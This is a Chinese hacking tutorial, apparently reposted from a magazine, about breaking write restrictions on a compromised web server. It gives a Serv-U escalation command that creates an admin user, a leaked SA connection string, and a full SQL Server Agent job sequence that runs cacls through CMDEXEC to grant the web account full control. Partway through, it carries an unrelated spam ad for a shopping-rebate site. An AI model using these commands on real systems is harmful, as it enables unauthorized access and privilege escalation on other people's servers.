写权限的突破.docVIP

写权限的突破 文/ KYO 不知道大家遇到过这种情况没有，就是你得到了一个网站的WEBSHELL，但是在编辑他网站目录里面的文件的时候却发现不能写，这个时候要多郁闷有多郁闷。下面我用一个例子来说明怎么去突破这个写权限。 至于怎么得到WEBSHELL我就不细说了，方法有很多种，上传漏洞，暴库，破解MD5再进后台上传或者利用备份数据库功能改后缀名等等。反正我是得到了一个WEBSHELL，如图1 HOHO~~发现主机中大部分文件都可以浏览，迫不及待的测试编辑文件，虽然WEBSHELL中显示编辑成功，但是再打开那个文件时却没有任何改动过的效果。说明写权限删除了。又在里面乱翻了一通找到了serv-u，用那个砍客联盟客户端木马查看也有SERV-U这个进程，自然的想到用su.exe来提升权限，命令如下F:\物理路径\suu.exe -i targrt ip -u kyo -p kyo327 -a f:能执行的话会在F盘创建一个用户名为kyo 密码为kyo327的超级用户，这样小小的写权限就到手了。而事实总喜欢捉弄我，这个IUSR_SCSYGJSERVER没有执行权限。 抽了两根烟郁闷了一会儿，才想起来在弄他WEBSHELL的时候探测到他里面有数据库用的是SQL SERVER，想都没想直接去找他数据库连接文件，找到这句代码 connStr=Provider=SQLOLEDB.1; Persist Security Info=True; Data Source=.; Initial Catalog=scyg; User ID=sa; Password=format c: 我晕，数据库连接对象竟然是SA，这不找死吗，密码也有个性format c: 打开查询分析器发现执行命令也是失败的，并且他的xp_cmdshell没有删除，这是我感到最诧异的。这个时候我彻底的没有了办法。 *************************************************************** 这里插播个广告，黑友们请无视，只是为朋友的网站能被搜索引擎收录，多加点流量。 返利网,淘你喜欢,淘宝返利,淘宝返现购物。 *************************************************************** 又郁闷了两天，我发现数据库用户里不但有我加的用户kyo,还有xiaolu，如下图 我才知道xiaolu 肯定也来玩过，好容易等到他上线，请教他了一下，才知道还是有希望执行命令的。打开查询分析器，用SA连接他的SQL SERVER，依次执行以下命令 use msdb; exec sp_add_job @job_name=kyo520; exec sp_add_jobstep @job_name=kyo520,@step_name = Exec my sql,@subsystem=CMDEXEC,@command=cacls.exe d:\newweblilemon /E /G IUSR_SCSYGJSERVER:F; （CACLS命令是改权限的，d:\newweblilemon 这个目录就是我需要改权限的那个目录） exec sp_add_jobserver @job_name = kyo520,@server_name = SCSYGJSERVER; (肉鸡的计算机名) exec sp_start_job @job_name=kyo520; 也许有一部分人对cacls命令不是很清楚，我顺便给出一部分说明。 C:\cacls 显示或者修改文件的访问控制表(ACL) CACLS filename [/T] [/E] [/C] [/G user:perm] [/R user [...]] [/P user:perm [...]] [/D user [...]] filename 显示 ACL。 /T 更改当前目录及其所有子目录中 指定文件的 ACL。 /E 编辑 ACL 而不替换。 /C 在出现拒绝访问错误时继续。 /G user:perm 赋予指定用户访问权限。 Perm 可以是: R 读取 W 写入